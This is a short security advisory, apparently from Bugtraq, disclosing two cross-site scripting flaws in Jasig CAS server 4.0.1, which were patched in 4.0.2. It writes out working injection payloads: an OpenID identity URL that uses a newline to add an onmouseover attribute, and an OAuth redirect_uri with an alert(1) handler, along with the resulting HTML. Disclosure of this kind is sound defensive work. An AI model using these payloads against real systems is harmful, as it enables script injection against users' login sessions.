Jasig CAS server vulnerabilities

Hi,

Jasig CAS server version 4.0.1 is prone to xss vulnerabilities

Timeline:

20.02.2015 - Vendor notified
11.05.2015 - Patches released
21.09.2015 - Bugtraq disclosure

Vulnerable version:

4.0.1

Fixed version:

4.0.2

Vulnerabilities details:


1) XSS in OpenID server


Obtain method:
Paste thi url
https://oauth.example.com/cas/openid/username"[new line]onmouseover="jscode
in OpenID client and try to log in.
space char is not allowed, you can use new line

Example redirection link
https://oauth.example.com/cas/login?openid.assoc_handle=1422619970824-0&openid.ax.mode=fetch_request&openid.ax.required=email&openid.ax.type.email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.identity=https%3A%2F%2Foauth.example.com%2Fcas%2Fopenid%2Fusername%22&openid.mode=checkid_setup&openid.return_to=https%3A%2F%2Fclien.example.com%2Faccount%2Fsignin%2Fcomplete%2F%3Fnext%3D%252F%26janrain_nonce%3D2015-09-21T11%253A15%253A10ZiTDjrd%26openid1_claimed_id%3Dhttps%253A%252F%252Foauth.example.com%252Fcas%252Fopenid%252Fusername%2527&openid.trust_root=https%3A%2F%2Fclient.example.com%2F

Result
<input type="hidden" id="username" name="username" value="username"
onmouseover="jscode" />

2) XSS in OAuth server

Example link
https://oauth.example.com/cas/oauth2.0/authorize?client_id=<client_id>&redirect_uri="onmou
seover=alert(1)%20.trusted-domain.com